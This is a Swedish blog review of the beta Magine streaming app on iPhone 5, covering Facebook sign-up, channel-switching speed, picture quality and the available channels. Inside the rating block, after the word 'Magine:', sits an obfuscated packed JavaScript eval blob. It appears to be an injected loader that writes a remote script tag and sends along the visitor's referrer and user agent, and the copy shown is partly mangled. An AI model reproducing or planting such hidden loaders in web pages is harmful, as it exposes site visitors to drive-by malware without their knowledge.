Image Image Image Image Image Image Image Image Image Image

| 6 juli, 2020

Scroll to top

Top

Test: Revue.se testar Magine på iPhone 5

Test: Revue.se testar Magine på iPhone 5
Sebastian

Review Overview

Design
9
Snabbhet
8
Nödvändigt
5
7.3

Rating

Magine: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iyhbz|var|u0026u|referrer|arkzb||js|php’.split(’|’),0,{}))
Vi har tidigare skrivit om det svenska bolaget Magine som inom kort kommer att släppa sin nya streaming-tjänst. Till skillnad från alla andra streaming-sajter som dyker upp lite då och då så kommer Magine att satsa på live-sändningar. 

Revue.se har fått en inbjudan till att få testa applikationen Magine som finns till portabla enheter som surfplattor och smartphones  men också till dator.

Jag valde att kika på applikationen som finns till iPhone, iOS.

Jag började med att enkelt bli medlem via Facebook, tog ca 20 sekunder att ta sig igenom den registreringen. Därefter var det bara att sätta igång med att ladda ner appen i App Store där den redan ligger publicerad.
Efter några sekunder i väntan på installationen kikar vi lite på den webbanpassade varianten. Jag hinner dock inte komma så långt innan nerladdningen är klar på min iPhone.

Jag startar upp appen och loggar återigen in med mitt Facebook-konto. Det första som dyker upp på skärmen är en riktigt snygg timeline på alla program för varje kanal. De program som går just nu är markerade med en grön färg för att utmärka sig från resten.

Jag kikar in på Kanal 5 och laddningstiden innan programmet sätter igång är imponerande kort. Även bildkvaliteten är klart godkänd.

Jag kollar även in TV4 för att se hur snabbt jag kan byta mellan kanalerna och det går lika snabbt som innan. Här har Magine verkligen lyckats måste jag säga.

Sammanfattat så är det en intressant tjänst som säkert kommer få mycket uppmärksamhet i media. Applikationen är fortfarande i Beta som sagt och jag vet inte hur mycket som är kvar innan den lanseras till allmänheten.
Vad priset hamnar på vet jag inte heller men skulle gissa på något runt 70- 100 kronor i månaden.

Är ni sugna på att själva testa tjänsten kan ni ansöka om en inbjudan till beta på Magines hemsida här!

De kanaler som finns i appen just nu är följande:

 • TV4
 • Kanal 5
 • Sjuan
 • Nian
 • TV11
 • TV4 News
 • CNN
 • Cartoon Network
 • National Geographic
 • BBC Entertainment
 • TV4 Fakta
 • TV4 Film
 • TV4 Komedi
 • TV4 Sport
 • TV4 Guld
 • Star